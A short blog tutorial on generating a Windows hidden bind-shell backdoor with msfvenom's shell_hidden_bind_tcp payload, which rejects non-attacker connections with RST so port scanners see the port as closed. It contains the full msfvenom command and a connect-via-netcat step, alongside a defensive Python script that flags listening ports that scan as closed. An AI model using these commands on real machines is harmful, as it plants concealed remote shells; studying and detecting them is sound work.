Nov 28, 2021

Windows Shellcode Behind Closed Port

This is a simple tactic for hiding a TCP bind shellcode on the Windows platform.

With msfvenom, generate a payload for the victim PC (a Windows machine) using the shell_hidden_bind_tcp payload and output it as an .exe file.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=[TCP_Port] -f exe > file.exe

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.203 lport=4321 -f exe > file.exe

This hidden bind TCP shell accepts connections only from the attacker's IP address (AHOST) and answers every other connection attempt with an RST packet. The port therefore appears closed, which disguises the shellcode.

With netstat, the port will appear as LISTENING. However, any port scanner will report it as "closed". To connect to the backdoor (from the AHOST IP address), use netcat.
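The LISTENING-but-closed discrepancy described above is also the thing a defender can look for. The following is an added example (not code from this post or from Metasploit): it parses a constructed netstat -ano dump, compares each listener with the verdict an external scan gave the same port, and reports ports that listen locally yet answered the probe with RST. Listener, parse_listeners, hidden_listeners and the sample data are assumed names and constructed values.

```python
import re
from dataclasses import dataclass
# One Windows `netstat -ano` listener line: proto, local addr:port, remote, state, PID
NETSTAT_LISTEN = re.compile(
    r"^\s*TCP\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)

@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    pid: int

def parse_listeners(netstat_output):
    """Return the TCP listeners found in `netstat -ano` text."""
    found = []
    for line in netstat_output.splitlines():
        m = NETSTAT_LISTEN.match(line)
        if m:
            found.append(Listener(m["addr"], int(m["port"]), int(m["pid"])))
    return found

def hidden_listeners(listeners, scan_states, allowlist=frozenset()):
    """Listeners whose port an external scan reported as 'closed' (RST).

    RST is what shell_hidden_bind_tcp sends to non-AHOST sources. A firewall
    that drops probes yields 'filtered', and loopback-only services are closed
    to the outside by nature, so both are left out to limit false positives.
    """
    suspicious = []
    for lst in listeners:
        if lst.port in allowlist or lst.addr.startswith(("127.", "[::1]")):
            continue
        if scan_states.get(lst.port) == "closed":
            suspicious.append(lst)
    return suspicious

# Constructed sample: a netstat dump plus the verdicts (port -> state) a scanner on another host returned.
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:4321           0.0.0.0:0              LISTENING       5120
  TCP    127.0.0.1:49670        0.0.0.0:0              LISTENING       2244
  TCP    192.168.1.50:49812     192.168.1.203:443      ESTABLISHED     3376
"""
SAMPLE_SCAN = {135: "open", 4321: "closed", 49670: "closed"}

if __name__ == "__main__":
    for hit in hidden_listeners(parse_listeners(SAMPLE_NETSTAT), SAMPLE_SCAN):
        print(f"port {hit.port} LISTENING under PID {hit.pid} but scans closed")
```

Port 49670 is bound to loopback and is skipped; port 4321 is the only listener that is LISTENING locally but answers an outside probe with RST.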

Below is the description at Rapid7.

Description

Listen for a connection from a certain IP and spawn a command shell. The shellcode will reply with an RST packet if the connection is not coming from the IP defined in AHOST. This way the port will appear as "closed", helping us to hide the shellcode.


Author(s)

    vlad902 <vlad902@gmail.com>
    sd
    Borja Merino <bmerinofe@gmail.com>

Platform

Windows


Architectures

x86


Links: